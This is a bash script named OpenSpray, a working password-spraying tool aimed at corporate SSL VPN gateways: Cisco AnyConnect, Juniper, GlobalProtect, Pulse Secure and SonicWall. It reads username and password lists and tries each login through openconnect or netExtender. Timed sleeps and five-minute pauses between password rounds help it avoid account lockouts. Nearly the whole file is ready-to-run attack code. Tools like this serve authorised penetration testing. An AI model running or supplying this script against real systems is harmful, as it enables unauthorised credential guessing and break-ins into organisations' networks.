#!/bin/bash
display_usage() {
	echo -e "Usage:\nopenspray [options]"
	echo -e "\nsudo apt-get install openconnect"

	echo -e "\nOptional addon for SonicWall"
	echo -e " wget https://software.sonicwall.com/NetExtender/NetExtender.Linux-10.2.816.x86_64.tgz"
	echo -e " tar xvzf  NetExtender.Linux-10.2.816.x86_64.tgz"
	echo -e " apt-get update"
	echo -e " apt-get install default-jre"
	echo -e " apt-get install ppp"
	echo -e " cd netExtenderClient"
	echo -e " ./install"
	echo -e " Set pppd to run as root [y/n]? y"
	echo -e " export PATH=\"<netExtenderClient_path>:\$PATH\"\n\n"

	echo -e "-h, --help\t\tDisplay help text"
	echo -e "-f\t\t\tSet username file"
	echo -e "-p\t\t\tSet password to spray"
	echo -e "-b\t\t\tSet password file to spray"
	echo -e "-s\t\t\tVPN Server"
	echo -e "\t[sevrer[:port]] for SonicWall NetExtender VPN"
	echo -e "-d\t\t\tSonicWall VPN Domain (default=LocalDomain)"
	echo -e "-v\t\t\tVPN Distro"
	echo -e "\tanyconnect\tCisco AnyConnect SSL VPN"
	echo -e "\tnc\t\tJuniper Network Connect"
	echo -e "\tgp\t\tPalo Alto GlobalProtect SSL VPN"
	echo -e "\tpulse\t\tPulse Connect Secure SSL VPN"
	echo -e "\tne\t\tSonicWall NetExtender SSL VPN"
	echo -e "\n-t\t\t\tSet sleep time between sprays (basic sleep commands; 5 = 5 seconds)"
	echo -e "-c\t\t\tpin-sha256 hash from server; argument shaped like: -c pin-sha256:<cert> (not required for ne)"
	echo -e "\t\t\t\tValue obtained from \`openconnect <server> --servercert=1234\`\n"
	echo -e "-r\t\t\tSet password as username: true. Default: false"
}

# if less than two arguments supplied, display usage 
	if [  $# -le 1 ] 
	then 
		display_usage
		exit 1
	fi 
 
# check whether user had supplied -h or --help . If yes display usage 
	if [[ ( $# == "--help") ||  $# == "-h" ]] 
	then 
		display_usage
		exit 0
	fi 
passAsUser="false"
password=""
domain="LocalDomain"
while getopts 'f:p:b:s:v:t:c:r:d:' option
do
	case "${option}"
		in
		f) file="${OPTARG}";;
		p) password=${OPTARG};;
		b) password_file=${OPTARG};;
		s) server=${OPTARG};;
		v) protocol=${OPTARG};;
		t) sleeep=${OPTARG};;
		c) cert=${OPTARG};;
		r) passAsUser=${OPTARG};;
		d) domain=${OPTARG};;
	esac
done
 
RED='\033[0;31m'
NC='\033[0m'
WHITE='\033[0;36m'
BLUE='\033[0;34m'
GREEN='\033[0;32m'

echo -e "${RED}###################${NC}"
echo -e "${RED}Starting OpenSpray!${NC}"
echo -e "${RED}###################${NC}"
if [ "$passAsUser" == "true" ];
then
	echo -e "${BLUE}Spraying username as password${NC}"
	for i in `cat $file`
	do 
		echo -e "${GREEN}%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%${NC}"
		echo -e "${WHITE}User: " $i "${NC}"
			
		if [ "$protocol" == "ne" ];
		then
			yes Y | netExtender -u $i -p $i -d $domain $server
		else
			echo $i | sudo openconnect $server --user=$i --passwd-on-stdin --protocol=$protocol --authenticate --servercert $cert
		fi

		echo -e "${GREEN}%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%${NC}"
		printf "\n\n\n"
		sleep $sleeep
	done
else
	if [ -n "$password_file" ]; then
		echo -e "${BLUE}Spraying VPN with password file${NC}"
	  	for j in `cat $password_file`
	  	do
	  		for i in `cat $file`
			do 
				echo -e "${GREEN}%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%${NC}"
				echo -e "${WHITE}User: " $i " Password: " $j "${NC}"
					

				if [ "$protocol" == "ne" ];
				then
					yes Y | netExtender -u $i -p $j -d $domain $server
				else
					echo $j | sudo openconnect $server --user=$i --passwd-on-stdin --protocol=$protocol --authenticate --servercert $cert
				fi

				echo -e "${GREEN}%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%${NC}"
				printf "\n\n\n"
				sleep $sleeep
			done
			echo -e "${BLUE}Sleeping for 5 minutes before next run${NC}"
			sleep 5m
		done
	else
  		echo -e "${BLUE}Not spraying username as password${NC}"
		for i in `cat $file`
		do 
			echo -e "${GREEN}%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%${NC}"
			echo -e "${WHITE}User: " $i " Password: " $password "${NC}"
			
			if [ "$protocol" == "ne" ];
			then
				yes Y | netExtender -u $i -p $password -d $domain $server
			else
				echo $password | sudo openconnect $server --user=$i --passwd-on-stdin --protocol=$protocol --authenticate --servercert $cert
			fi

			echo -e "${GREEN}%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%${NC}"
			printf "\n\n\n"
			sleep $sleeep
		done
	fi
fi
